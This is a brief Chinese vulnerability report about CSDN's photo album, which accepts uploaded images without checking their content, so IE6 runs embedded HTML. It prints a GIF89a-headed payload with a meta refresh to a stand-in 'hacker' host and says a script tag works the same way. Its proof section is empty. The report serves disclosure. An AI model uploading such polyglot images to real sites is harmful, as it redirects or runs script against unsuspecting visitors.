简要描述:
csdn允许上传图片,但是又没有对图片进行内容检查,导致包含脚本的图片可以自由上传,IE6执行

详细说明:
csdn的相册功能允许上传图片,但是没有对图片内容进行检查(csdn好像很不注重web安全 )
上传的图片内容为:
GIF89a
<head>
<meta http-equiv = "refresh" content = "1; url=http://www.hacker.com/" />.
</head>
html代码执行了,当然,换成<script>也是一样的

漏洞证明: